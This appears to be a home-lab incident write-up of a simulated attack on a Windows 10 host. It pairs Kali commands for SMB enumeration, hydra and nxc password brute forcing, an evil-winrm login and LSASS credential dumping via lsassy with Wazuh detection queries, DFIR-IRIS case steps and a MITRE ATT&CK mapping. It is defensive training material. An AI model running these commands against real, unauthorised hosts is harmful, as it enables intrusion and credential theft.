Case 2 – Windows Host Compromise Attempt

This case simulates an attacker trying to compromise the Windows 10 host. The investigation includes attacker activity (Kali), SIEM visibility (Wazuh), and incident response workflow (DFIR‑IRIS).

1. Case Overview

• Date: 2026‑03‑03
• Target: Windows 10 (10.10.10.20)
• Attacker: Kali Linux (10.10.10.40)
• Detection Source: Wazuh SIEM
• IR Platform: DFIR‑IRIS

2. Attack Simulation (Kali)

Summary of attacker actions performed from Kali.

2.1. Enumeration

Scan the Windows host.

Attempt SMB enumeration.

smbclient -L //10.10.10.20 -N

2.2. Login Attempts

Weak credential login (simulated brute force).

sudo hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 smb2://10.10.10.20
sudo nxc smb 10.10.10.20 -u administrator -p passwords.txt

WinRM session try.

evil-winrm -i 10.10.10.20 -u testuser -p test123

2.3. Credential Dumping Attempt

Simulate credential dumping attempt.

sudo nxc smb 10.10.10.20 -u administrator -p 'administrator' -M lsassy

3. Detection and Analysis (Wazuh SIEM)

How Wazuh detected and logged the activity.

3.1. Alerts

Security events.

agent.name: "WIN10-WAZUH_AGENT" AND rule.level >= 5

3.2. Log Evidence

Failed login alerts.

agent.name: "WIN10-WAZUH_AGENT" AND rule.id: (60122 OR 60105 OR 60112)
agent.name: "WIN10-WAZUH_AGENT" AND data.win.eventdata.logonType: 3 AND rule.level >= 5
agent.name: "WIN10-WAZUH_AGENT" AND rule.id: 60104
# https://github.com/wazuh/wazuh-ruleset/blob/master/rules/0580-win-security_rules.xml

3.3. WinRM Sessions?

agent.name: "WIN10-WAZUH_AGENT" AND data.win.eventdata.parentImage: *wsmprovhost.exe*

3.4. Credential Dumping Detection (LSASS)

agent.name: "WIN10-WAZUH_AGENT" AND data.win.system.eventID: 10

4. Incident Response (DFIR‑IRIS)

How the case was documented and analyzed in DFIR‑IRIS.

4.1. Case Creation

4.2. Evidence Added

4.3. IOCs

4.4. Timeline Reconstruction

5. MITRE ATT&CK Mapping and Conclusion

• TA0007 – Discovery
• T1046 – Network Service Scanning
• T1135 – Network Share Discovery
• TA0006 – Credential Access
• T1110.001 – Brute Force: Password Guessing
• TA0008 – Lateral Movement
• T1021.002 – Remote Services: SMB/Windows Admin Shares
• T1021.006 – Remote Services: WinRM
• T1003.001 – OS Credential Dumping: LSASS Memory

6. Case Closing

The attacker performed enumeration, brute force attempts, and login attempts. No compromise occurred. Wazuh successfully detected the activity, and DFIR‑IRIS was used to document the investigation.

← Back to Home